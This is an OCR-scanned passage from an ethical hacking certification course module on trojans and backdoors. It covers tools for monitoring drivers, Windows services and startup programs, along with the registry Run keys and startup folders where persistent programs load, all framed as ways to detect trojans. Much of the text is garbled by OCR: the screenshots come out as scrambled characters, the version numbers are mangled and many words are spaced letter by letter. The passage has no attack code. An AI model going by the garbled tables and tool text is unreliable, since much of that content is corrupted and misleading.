file Type Dnvtf Display [>wf 0!5ptoy Driver System D 1r»«r System 0r1*e System Oliver Net*orlr Oliver Unknown f*et*cA01‫«»׳‬ NetworfcD 1‫׳‬ve» Syltern D im t Viter‫ ״‬Differ Application NatAOfli Oiivef V,• < a r ‫ ״‬R•‫•׳‬ 0‫׳׳‬v e» S 'rt"" D t*> *r $y*em DrNtr Unknown Syitcm 0 1 1v® System Oliver V/flnr• Oliver Sytttm Diver Unknown S.-U0 T ! Oliver

Desciip&on W1ndc«5 NT OpenType/Type 1... Canonical Display Driver Framebuffer Deploy Driver Multi-UserWin32Orrvw Pass thru parser Native VUG palter MSRemote Access serial networ... Strvtf dnvtt 5m t»2.0 Server drivn WD Miniport Dover Fik Sytfem Dependency Manag... TCP/IP Registry Compatibility 0... S«rv«t Netwoik On.‫וי‬ MHnmnn tICURITV D > k‫׳‬w M.c‫׳‬osc« RDf Device !•director npf.ey*(NTV6 AM064) Kernel D... NiProbeMemfoeObserver Devie... HTTP Protocol Stick lun parser ConsoleDriver Mkmoft Storage Port Driver V iiUmI Encryption Drive lonahoin SM8 2 .0 Redirector

Version S.1.&234 6.2 .8 4 0 00 6 .2 .8 4 0 0 1 0 62.84000 6 2 .8 4 0 0 1 0 6 ?84000 6 ? 04000 6 2 .8 4 0 0 1 0 02.64000 6.2.84000 62.8400.0 6 .2 .8 4 0 0 1 0 .. MOO. 4J.M.0 62.84000 41 .0 .2 0 0 1 1 6 .0 .8 .0 6 2 .8 4 0 0 1 0 62.84000 6.?.8400 0 6 .2 ,8 4 0 0 1 0 7.0 .0 .0 62.8400.0

Company Adobe System™ Microsoft Corp.. Microsoft Corp-. Microsoft Corp... Microsoft Corp... Microsoft Corp... Microsoft Corp... MiCfOJOftCorp.. Microsoft Corp... Microsoft Corp.. Microioft Corp... Mkrosoft Corp... MitiovoH Corp.. M iiw w n C Microsoft Corp.. CACI lochnoL. Network Insttu. Microiolt Corp... Microsoft Corp.. Microsoft Corp.. Microsoft Coep... NewSoftwares.... Microsoft Coro...

oxoooxt. a OXOOOXXOXOOOXC 0X000X10X000X1.. 000000x 10X000X10x000051oxoooo: 1oxooox 1‫״‬ 0X 00000-10X 00000-10X0000310x00005 1 .. 0X0000: 1 oxooox 1_ 0X0000:10X0000510X000031oxoooo: 10X00003 1 .. 00000003'1 0X0000310X0000:‫״‬

http://www.nirsoft.net
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

D evice D riv ers M o n ito rin g Tool: D riverV iew
Source: http://www.nirsoft.net The DriverView utility displays the entire currently loaded device drivers list in your system. Additional information is displayed for each and every driver in the list such as load address of the driver, description, version, product name, company that created the driver, etc. Instead of browsing for system components separately in Control Panel, just by running this application on your system you can easily know all the drivers on your system. This application displays the list of drivers that are on your system quickly and easily. It can create HTML reports.

Module 06 Page 964

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

35
Fite Edit 0 ^ View !‫ע‬ Options Help

DriverView

a

$
Address 000C000000B69000 O O O O O O O O O O 8FFO O O 00000000 00709000 O O O C O O O O 'O O l62000 O O O C O O O O 'l69F3000 00000000169E9000 O O O C O O O O '1 6 9D D 00 0 Size 0x00060000 0x00036000 0x00009000 0x003ed000 O x O O O O b O O O O x O O O O a O O O O x O O O O c O O O O x O O O O c O O O 0x0009e O O O 0x0009d000 0x00080000 0x00012000 0x00012000 0x00044000 O x O O O O b O O O 0x00031000 O x O O O O c O O O O x O O O O fO O O 0x0002f000 O x O O O elO O O O x O O O O b O O O O x O O O O d O O O 0x00054000 0x00040000 0x00039000 Load... 2 1 1 5 1 1 1 1 1 1 1 2 1 3 1 1 1 1 1 1 1 1 1 1 1 Index 125 124 123 1 2 1 153 149 148 147 1 1 6 145 1 5 1 150 142 1 4 1 140 139 137 136 135 134 154 143 152 144 133 File Type Driver Display Criver Display Criver System Criver System Criver System Criver Network Driver Unknown Network Driver Network Driver System Criver System Criver Application Network Driver System Criver Driver System Criver System Criver Unknown System Criver System Criver System Criver System Criver Unknown Svstem Criver Description Windows NT OpenType/Type 1 ... Canonical Display Driver Framebuffer Display Driver Multi-User Win32 Driver Pass thru parser Native VHD parser MS Remote Access serial networ... Server driver Smb 2.0 Server driver VHD Miniport Driver File System Dependency Manag... TCP/IP Registry Compatibility D... Server Network driver Macrovision SECURITY Driver Microsoft RDP Device redirector Version 5.1.2.234 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 4.3.86.0 6.2.8400.0 Company Adobe System... End A... O O O O O O O O 'O .. Microsoft Corp... 00000000 0.. = Microsoft Corp... O O O O O O O O 'O .. Microsoft Corp... O O O O O O O O 'O ., Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Macrovision C... CACE Technol... Network Instru... 000000001.. 000000001.. 000000001.. O O O O O O O O 'I.. HTTP Protocol Stack lun parser Console Driver Microsoft Storage Port Driver Virtual Encryption Driver Lonohorn SMB 2.0 Redirector 6.2.8400.0 6.2.8400.0 6.2.8400.0 6.2.8400.0 7.0.0.0 6.2.8400.0 Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. Microsoft Corp... 000000001.. NewSoftwares.... 000000001.. Microsoft Coro... (XXXXXXX) 1.. v Microsoft Corp... 000000001..

Driver Name * ATMFD.DLL * cdd.dll * TSDDD.dll ♦ win32k.sys passthruparser.sys ^ vhdparser.sys ^ asyncmac.sys

* WPRO_41_2001.sys O O O C O O O O 'l69D1000 ♦ srv.sys O O O C O O O O 'l6933000 ‫י‬ • srv2.sys ^ vhdmp.sys # FsDepends.sys ^ tcpipreg.sys ® srvnet.sys £ secdrv.SYS ♦ rdpdr.sys ^ npf.sys ‫י‬1‫ י‬NiProbeMem.SYS ^ WinVDEdrv6.sys * HTTP.sys ♦ lunparser.sys • condrv.sys ^ storport.sys ♦ WinVDEdrv.sys ‫ ♦י‬mrxsmb20.svs 155 item(s), 1 Selected O O O C O O O O 'l6896000 O O O C O O O O 'l6812000 O O O C O O O O '1 6800000 O O O C O O O O '1 5 FE3 00 0 O O O C O O O O '1 5 F9 F0 0 0 O O O C O O O O '1 5 F9 4 00 0 O O O C O O O O '1 5 F6 3 00 0 O O O C O O O O '1 5 F5 7 00 0 O O O C O O O O '1 5 F4 8 00 0 O O O C O O O O 'l5F19000 O O O C O O O O 'l5E38000 O O O C O O O O 'l5 EO D O O O O O O C O O O O 'l5E00000 O O O C O O O O 'l5D9E000 O O O C O O O O 'l5 D 5EO O O O O O C O O O O 'l5D25000

npf.sys (NT5/6 AMD64) Kernel D... 4.1.0.2001 NiProbeMem for Observer Devic... 16.0.8.0

FIGURE 6.56: DriverView Screenshot

Module 06 Page 965

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Device D rivers M onitoring Tools
i

CEH

jnj
V

h t t p :/ / w w w .d r i\ / e r s h q .c o m

Driver Detective

h ttp :/ / w w w .r e v iv e r s o ft.c o m

Driver Reviver

\^
(v

h t t p :/ / w w w .z h a n g d u o .c o m

Unknown Device Identifier

1

_•

h t t p :/ / w w w .u n ib lu e .c o m

DriverScanner

y y

,

h ttp :/ / w w w .d r iv e r g u id e to o lk it .c o m

DriverGuide Toolkit

‫ו‬
BBB

h t t p :/ / w w w .b o o z e t .o r g

Double Driver

H

h t t p :/ / w w w .in n o v a t iv e s o l.c o m

DriverMax

□ □‫ם‬

h t t p :/ / w w w .z h a n g d u o .c o m

M y Drivers

h t t p :/ / w w w .d r i\ / e r m a g ic ia n .c o m

Driver Magician

h ttp :/ / w w w .d r iv e r e a s y .c o m

DriverEasy

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

D evice D riv ers M o n ito rin g Tools
A few of the device driver monitoring tools that help in detecting Trojans are listed as follows: 0 0 0 0 0 0 0 0 0 0 Driver Detective available at http://www.drivershq.com Unknown Device Identifier available at http://www.zhangduo.com DriverGuide Toolkit available at http://www.driverguidetoolkit.com DriverMax available at http://www.innovative-sol.com Driver Magician available at http://www.drivermagician.com Driver Reviver available at http://www.reviversoft.com DriverScanner available at http://www.uniblue.com Double Driver available at http://www.boozet.org My Drivers available at http://www.zhangduo.com DriverEasy available at http://www.drivereasv.com

Module 06 Page 966

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Scanning for Suspicious Windows Services
Trojans spawn Windows services allow attackers remote control to the victim machine and pass malicious instructions Trojans rename their processes to look like a genuine Windows service in order to avoid detection
Enterprise Service Manager L^_ ‫ם‬ x

DtaftvN**! *J <•■!‫׳‬ 0J £'<r,p‫׳‬r : Pie $*wrn(E... OJ WndOM Evrrr L03 0J CCM• £1»‫־‬ Kl OJ f uvl»‫־‬n 0 ocovffy Prcvi OJ fmcfen 0 ■cvivr R*w... OJ *re v ** Fart C«*1« 5a A/Wnjciia FtearhlnnFo •#'1c10:o‫״‬FT=$e!Mco 1 U i- ,‫ ״‬fw‫ ״‬n«1

1 r <m p1i.11 <Lccei Slap Run‫״‬ 1CTvTUB (Lceel <L00il... <l«el <L00J ... tlccsJ... <Lcc«l .. <Local... <| r r ‫׳‬J I Him. Rim.. Stop vU > p.. Rum.. Slop. Rum.. R*‫י ״‬

0 comtM.<Jl ®-nvoierrro (?■(W IO fTfO.. [?**ndrSV

Path C:\W1 .. f f D V V V I C .VW 1‫״‬ t\V /l CAV/1‫״‬ c m .. e:\w1 a m ... rsv/•

SwipTjpo Automatic M Automatic Automatic Manu5l Manual Automatic Manual Automatic 61l1m.hr

A

J

V

Trojans employ rootkit techniques to manipulate HKEY_LOCAL_MACHINE\System\CurrentControlSet \Services registry keys to hide its processes

I-M 55E LC K .4K 41

1a r 6/ a

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S c a n n in g fo r S u s p ic io u s W in d o w s S e rv ic e s
w

O n c e t h e T r o ja n s a re in s t a lle d o n W i n d o w s s e rv ic e s , it b e c o m e s easy f o r an a t t a c k e r t o o p e r a t e t h e s y s te m f r o m a r e m o t e l o c a tio n . T r o ja n s a lso c r e a te t h e i r p ro ce s se s t o lo o k like g e n u i n e W i n d o w s se rv ic e s in o r d e r t o a v o i d d e t e c t i o n . W i t h t h e h e lp o f W i n d o w s se rvice s m o n i t o r i n g to o ls , y o u can d e t e c t t h e T ro ja n s . T r o ja n s t h a t s p a w n W i n d o w s se rv ic e s a l l o w a t ta c k e r s r e m o t e c o n t r o l t o t h e t a r g e t m a c h in e a nd pass m a lic io u s in s t r u c t io n s . T ro ja n s r e n a m e t h e i r p ro c e s s e s t o l o o k like a g e n u i n e W i n d o w s s e rv ic e in o rd e r to a v o id d e te c tio n . T r o ja n s e m p lo y ro o tk it te c h n iq u e s to m a n ip u la t e

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services registry keys t o h id e t h e i r
p ro cesse s.

M odule 06 Page 967

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Enterprise Service Manager
F ile V ie w A ctio n S e rv ic eT y p e ‫י‬ ‫י‬ • R e g u la r D is p la yN a m e H e lp

C

D riv e rs

C

A ll D e s c rip tio n

R e fre s h C o m p u te r S ta tu s < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . < L o c a l. . . ✓ 1 n r^ l S to p ... R u n n ... R u n n ... R u n n ... R u n n ... S to p ... S to p ... R u n n ... R u n n ...
R in n

Select a workstation < Local Machin P a th C A W i... C A W i... C A P r... C A W i... C A W i... C A W i... C A W i... C A W i... C A W i... C A W i...
r \w !

S ta rtu pT y p e M a n u a l A u to m a tic A u to m a tic A u to m a tic A u to m a tic M a n u a l M a n u a l A u to m a tic M a n u a l A u to m a tic
A tf n m s lir

A

E x te n s ib leA u th e n tic a tio n ... @ % s y s te m r o ... U #E n c ry p tin gF ileS y s te m( E ... @ % S y s te m R ...

I ----1

1 iy s 1 d !1 s t2 9
ft? W in d o w sE v e n tL o g C 0 M +E v e n tS y s te m @ % S y s te m R ... @ c o m re s .d ll,...

p

F u n c tio nD is c o v e ryP ro v i... @ % s y s te m r o ...

ft? F u n c tio nD is c o v e ry R e s o ... @ % s y s te m r o ...

QkfW in d o w sF o n tC a c h eS e r ...
M ic ro s o ft F T PS e rv ic e
R r n i in P n lir it P lip n r

@ % s y s te m r o ... @ % w in d ir% V ..

d# W in d o w sP re s e n ta tio nF o ... @ % S y s te m R ... < L o c a l. . . S to p ...

1

1

V

1 S 9S e rv ic e s

1C o m p u te r(s )

A d m in is tra to r

W IN -M S S E L C K 4 K 4 1

1 0 /6 /2 ■^

FIGURE 6.57: Scanning for Suspicious Windows Services

M odule 06 Page 968

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

W i n d o w s S e r v i c e s M o n i t o r i n g T o o l: W in d o w s S e rv ic e M a n a g e r^ S rv M k n )
W in d o w s S e rv ic e M a n a g e r s im p lif ie s a ll c o m m o n ta s k s r e la te d t o W in d o w s s e r v ic e s . I t c a n c r e a te s e rv ic e s ( b o th W in 3 2 a n d L e g a c y D r iv e r) w i t h o u t r e s ta r t in g W in d o w s , d e le t e e x is tin g s e rv ic e s , a n d c h a n g e s e r v ic e c o n f ig u r a tio n

©
File View Service Help Stole Type Win32 dnvei ?hared drive! drive! dnvet ?hared wr!32 thared *hared wn32 FS dav« FS driver wr>32 FS driver thared drvot drvoi drv*t tharod iliaed ,h « .d Ci;plcy ra re Irtcmol narrc ■ P ^ D M S y s A ... stepped runring K w tunning .v>C5N5PD . stepped >*>CSM5PD.. runring C5Ndi5LVF stepped $ DcomLau.. runring defragsv‫׳‬c stepped 3 Dei/fceAi stepped | Dc/colro... stepped lunrino ‫ &־‬D fs runring 0 Dftc O DfsDiivoi runring DFSR runring fT)Df«r10 runring mnrino # Dhcp runring dijoocho tunring ^ disk stepped dmv*c Druoack© runring stepped 9 doOsvc runring & OPS

Service Manage:‫־‬
Sta-ttype nam d nanod 00(0 tyrterr :yjtem ivsterr auto nonod nanu^l nonod 0U0 tyckrr :‫חס*גץ‬ MilO bcc» *.to tyjkxx beet aeto rwnod *.«‫״‬ Executable ‫״‬ C:\'‫׳‬Vin<lcws\Jvs!em32\dlho?texe /P tc c s s s id y ^ ^ ■ SystemG^dnversScondrv.sys C.Windcm\iy«lem32'^vd10‫־‬ jt exe -k Sjsten132\Dr1vers>C5N5FDTS8Z syt J Sy3tem32\Drivcr»'1CSNEFDTSS2<64. ays Ss1sem.32\Drivers\C$NdsL'‫׳‬VF. sys C:\VV1n<Sws\?ystem32Uvcho«texe •k DcomL... C.\'1Vindcvt5\iy5len132'vjvch0jt exe •k defray. C‫\־‬W1ndcws\iystefn32Vsvch!Mt exe •k Locals C:\Windw*\»yalerr02'14vcho»t cxo •k DoomL... C.\windcv1s\jvstem32l\dfs5vc ew Sy««n132\Df1vere\d1 tc tyf jy}terr02\dr ivwsSdf*. *ys C \Wmdews\tj1«t«tvi?VDFSRi »xo SSy»iarr1cot''4/jtem32'‫«׳‬dtiver»Vd:«ro 4y« CAVAndCW\^tern32\SVChO« «<e •k Locals S)«flra32\drivef«Vdboocko eyo SSyslmPMXVSyite1n32Sciiv‫׳‬er>\dijk. jys 'Sys1arFeor\Sy8te1n32'1e»11/ers\dmvJC sy* C:\Windcvte\#>ete1r132UvchMt e«0 ■k Melwor... CA'Windcw5\iy5len132\jV'ch0it exe •k LocolS.. C\\W1n<lcws\Systen»32\tvcl‫־‬ £»st. es-e •k Local Rejlart seivice

CO N-► S^tenApofcabun Confole D n/« Cryptogiophic Servces CSN5HZTS82NDIS Ptyoca D«ver CSNEFDTSCac^ VOS Vetoed Dtv<* C$NdsLV»f HD1S Pwtcco D t^ f DCOM Server ^ c c e tt Laurchy Optimzc d i/e j Device Assaciakr! Serve• D cvcch ita l Servce DFS Noi 1e:w-e DFS Nanetp-K* Chent L rv*■ DrS Name«pa~o $ o \«1 Fllei 0 ‫ס׳יי‬ DFS Raplkalan DrS Flcplcabcr RcocC rf> Dtvct DHCP Cleri SyttonAtirbjto Cacto Disk Driver drvsc DNS Ciori WiedAutoConfg DiagrcRbc Poley Ser\»c#

v

http://tools.sysprogs. org
Copyright © by

EG-Gouncil. All Rights Jteseivfed'.;Reproduction is Strictly Prohibited.

W i n d o w s S e r v i c e s M o n i t o r i n g T o o l: W i n d o w s S e r v i c e M a n a g e r (S rv M an )
S o u rc e : h t t p : / / t o o l s . s y s p r o g s . o r g W i n d o w s S e rvice M a n a g e r is a t o o l t h a t a llo w s y o u t o s h o r t e n all p u b li c t a s k s lin k e d t o W i n d o w s se rvice s. T his can g e n e r a t e d i f f e r e n t se rv ic e s f o r W i n 3 2 a nd Legacy d r iv e r s w i t h o u t s h u t t i n g d o w n a n d r e s t a r t i n g W i n d o w s . It can also c a n c e l e x is t in g s e rvice s a n d m a n ip u la t e o t h e r c o n f i g u r a t i o n services. It has b o t h GUI a n d c c o m m a n d - l i n e m o d e s . It can also be u sed t o ru n a r b i t r a r y W i n 3 2 a p p li c a t i o n s as services. It s u p p o r t s all m o d e r n 3 2 - b i t a n d 6 4 - b i t v e r s io n s o f W in d o w s .

M odule 06 Page 969

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

File

View

Service

Help Type Win32 driver shared diivei driver driver shaied Win32 shaied shaied Win32 FS diivei FS diivei Win32 FS diivei shaied driver driver driver shared shared shared Display name C0M+ System Application Console Driver Cryptographic Services CSN5PDTS82 NDIS Protocol Driver CSN5PDTS82x64 NDIS Protocol Driver CsNdisLWF NDIS Protocol Driver DCOM Server Process Launcher Optimize drives Device Association Service Device Install Service DFS Namespace DFS Namespace Client Driver DFS Namespace Server Filter Driver DFS Replication DFS Replication Readonly Driver DHCP Client System Attribute Cache Disk Driver dmvsc DNS Client Wired AutoConfig Diagnostic Policy Service ] ] | | Start service Start type manual manual auto system system system auto manual manual manual auto system system auto boot auto system boot manual auto manual auto Executable C: \Windows\system32\dllhost. exe /Processid.. System32\drivers\condtv. sys C:\Windows\system32\svchost.exe • kNetwor... System32\D rivers\CSN5PD TS82. sys System32\Drivers\CSN5PDTS82x64.sys System32\Drivers\CsNdisLWF.sys C:\Windows\system32\svchost.exe •k DcomL.. C:\Windows\system32\svchost.exe •k defiag... C:\Windows\system32\svchost.exe •k LocalS... C:\Windows\system32\svchost.exe •k DcomL... C: \Windows\system32\df ssvc. exe System32\D river$\dfsc. sys system32\drivers\dfs. sys C: \Windows\system32\D FSRs. exe \SystemRoot\system32\d1ivers\dfsrro.sys C:\Windows\system32\svchost.exe •k LocalS... System32\d1ive1s\discache. sys \SystemR00t\System32\drivers\disk.sys \SystemR00t\System32\drivers\dmvsc sys C:\Windows\system32\svchost.exe •k Networ C:\Windows\system32\svchost.exe •k LocalS... C:\W1ndows\System32Vsvchost exe •k Local.. | Restart service [__________________Exit

Internal name

State ,^)COMSysA... stopped condrv running $ CryptSvc lunning V C S N 5 P 0 ... ,>CSN5PD... stopped lunning

A

->CsNdisLWF stopped $ DcomLau... running defragsvc DeviceAs... stopped stopped

Devicelns... stopped running ■^>Dfs lunning O ^fsD river •\fcDFSR ^)D IsrR o $ Dhcp lunning lunning lunning lunning tunning tunning stopped running stopped lunning Properties... Add service

^ discache
i^ d is k dmvsc Dnscache 3 dot3svc £ DPS

V

Delete service_____________ ]

FIGURE 6.58: Windows Service Manager (SrvMan) Tool Screenshot

M odule 06 Page 970

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Windows Services Monitoring Tools
SMART Utility

CEH

o

h ttp ://w w w . thewindowsclub.com

i

AnVir Task Manager
http://w w w .anvW . com

Netwrix Service Monitor
h ttp ://w w w . netwrix.com

Process Hacker
h ttp://processhacker.sourceforge.net

Vista Services Optimizer
h ttp://w w w .sm artpcu tilities.com

Free Windows Service Monitor Tool
http://w w w .m anageengine.com

ServiWin
h ttp ://w w w . nirsoft.net

E

5 5

Overseer Network Monitor
h ttp://w w w .overseer-netw ork-m onitor.com

Windows Service Manager Tray
http://w inservicem anager.codeplex.com

Total Network Monitor
http://www.softin\/enti\/e.com

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

f

B

W in d o w s S e rv ic e s M o n ito r in g T o o ls
W i n d o w s S e rvice s m o n i t o r i n g t o o l s m o n i t o r c r itic a l W i n d o w s s e rv ic e s a n d o p t i o n a l l y

r e s t a r t t h e m a f t e r fa ilu r e . A f e w o f t h e W i n d o w s s e rv ic e m o n i t o r i n g t o o l s t h a t a re r e a d ily a v a ila b le in t h e m a r k e t a re lis te d as f o l lo w s : 0 0 0 0 0 © 0 0 0 0 S m a r t U t i l i t y a v a ila b le a t h t t p : / / w w w . t h e w i n d o w s c l u b . c o m N e t w r i x S ervice M o n i t o r a v a ila b le a t h t t p : / / w w w . n e t w r i x . c o m V ista Services O p t i m i z e r a v a ila b le a t h t t p : / / w w w . s m a r t p c u t i l i t i e s . c o m S e r v iW in a v a ila b le a t h t t p : / / w w w . n i r s o f t . n e t W i n d o w s S ervice M a n a g e r T ra y a v a ila b le a t h t t p : / / w i n s e r v i c e m a n a g e r . c o d e p l e x . c o m A n V i r Task M a n a g e r a v a ila b le a t h t t p : / / w w w . a n v i r . c o m Process H a c k e r a v a ila b le a t h t t p : / / p r o c e s s h a c k e r . s o u r c e f o r g e . n e t Free W i n d o w s S ervice M o n i t o r T o o l a v a ila b le a t h t t p : / / w w w . m a n a g e e n g i n e . c o m O v e r s e e r N e t w o r k M o n i t o r a v a ila b le a t h t t p : / / w w w . o v e r s e e r - n e t w o r k - m o n i t o r . c o m T o ta l N e t w o r k M o n i t o r a v a ila b le a t h t t p : / / w w w . s o f t i n v e n t i v e . c o m

M odule 06 Page 971

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

C EH
Check start up folder
C :\ProgramData\Microsoft \Windows\Start Menu\Programs'^ Star tup C:\Users\(UserName)\AppData\Roaming\ Microsoft\Windows\Start Menu\Programs'^ Star tup

©

Check start up program entries in the registry Details are covered in next slide

Check W indows services automatic started
G o to R un Type s e r v ic e s .m s c -> S o rt b y S t a r tu p T y p e

Check device drivers automatically loaded

C:\Windows\System32\ drivers

Check boot, ini o r bed (bootmgr) e n t r i e s

Copyright © by

EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

S c a n n in g fo r S u s p ic io u s S ta rtu p P r o g r a m s
T ro ja n s , once in s t a lle d on th e c o m p u te r, s ta rt a u to m a tic a lly at sys te m s ta rtu p . T h e r e f o r e , s c a n n in g f o r s u s p ic io u s s t a r t u p p r o g r a m s is v e r y e s s e n tia l f o r d e t e c t i n g T ro ja n s . By f o l l o w i n g th e s e s im p le ste ps, y o u can i d e n t i f y if t h e r e a re a n y h id d e n T ro ja n s :

Step 1: C h e ck t h e S t a r t u p f o l d e r

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup C :\Users\ (User-Name) \AppData\Roaming\Microsoft:\Windows\Start Menu\Programs\Startup
Step 2: C h e ck W i n d o w s s e rv ic e s a u t o m a t i c s ta r t e d
Go t o Run, t y p e se rv ic e s .m s c , a n d clic k Sort by Startup Type

Step 3: C he ck s t a r t u p p r o g r a m e n t r i e s in t h e r e g is t r y Step 4: C h e ck t h a t d e v ic e d r iv e r s a re a u t o m a t i c a l l y lo a d e d :

C :\Windows\System32\drivers
C h e ck

boot.ini o r bed ( b o o t m g r ) e n t r i e s

M odule 06 Page 972

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Windows 8 Startup Registry Entries
Explorer Startup Setting

CEH
(•rtifwd ithiul •UtkM

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, C o g n i t i o n Start.up HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, load

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Startup Setting

HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks

IE

Startup Setting

HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar HKLM\SOFTWARE\MicrosoftMnternet Explorer\Extensions HKCU\SOFTWARE\Microsoft\Internet Explorer\MenuExt

P r o g r a m s t h a t r u n o n W in d o w s s t a r t u p c a n b e lo c a te d in th e s e r e g is t r y e n t r ie s

Copyright © by

EG-G*ancil. All

Rights Reserved. Reproduction Is Strictly Prohibited.

W in d o w s 8 S ta rtu p R e g is try E n trie s
P r o g r a m s t h a t ru n o n W i n d o w s s t a r t u p can be l o c a te d in th e s e r e g is t r y e n tr ie s :

HKLM\SOFTWARE\Microsoft\windows\Currentversion\Explorer\Shell Folders, Common startup

Explorer Startup Setting

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shel1 Folders, Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup HKCU\Software\Microsoft\Windows NT\CurrentVerslon\Windows, load

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Startup Setting

HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKCU\Software\Microsoft\Internet Explorer\UrlSearchHook3

IE Startup Setting

HKLM\S0FTWARE\Micro3oft\Internet Explorer\Toolbar HKLM\SOFTWARE\MicrosoftMnternet Explorer\Extensions HKCU\SOFTWARE\Microsoft\Internet Explorer\MenuExt

FIGURE 6 .5 9 : W in d o w s 8 S ta rtu p R e g istry E n trie s

M odule 06 Page 973

Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 C ertified Ethical Hacker

Startup Programs Monitoring Tool: Starter
Starter is a startup manager for Microsoft Windows

CEH

It allows you to view and manage all the programs that are starting automatically whenever OS is loading ra

S t a r t e r ( S e r v e r 4 . 0 ) F i l eE d i tC c n f . g u i a t o nH e l p a □ 0 3 ♦ a J a : r r * - R e f r e s h1 L E d i t ] a u n c hP r o p e r t i e sC p b o n i A b c u t ‫"־״‬
^ Processes | Seivi ections S B tf % All sections (18) 1 jU Startup folden(l) Current user g i Allu1*»<1) £*‫ ־‬Default user J0 Regiiby (17) & Current user (7) J# Run (6 1 M RunOnce (I) 3 l i Alluwu(IO) H Run (9] j$ RunOnce 3 RunOnceE... H RunServicei 3 RunServic*.. 9 t? Drfaultuser 3 Run 3 RunOnc* I 3 1N1 files

1 ‫ם ־‬. x /72m
Eratt.. lil) Yes fed v«s D«c!p!bn

Vaie
(3 t f APC (3 < f APC a Driver Detective (3 dtii.exe 0 & ElcomSoftDPR (3 £ ) EMET Notifiar [7] f> * EPSON UD STARE □ i r FlBacleup 9009lataH i (3 GTWhois •St rronimgr (3 1nS.na [ 3 U I Sn:gi: 1 0 .Ink [3 ivcnM 0 Title (3 Unin-taII C:\Uvc , a r a WinFLTray

(3

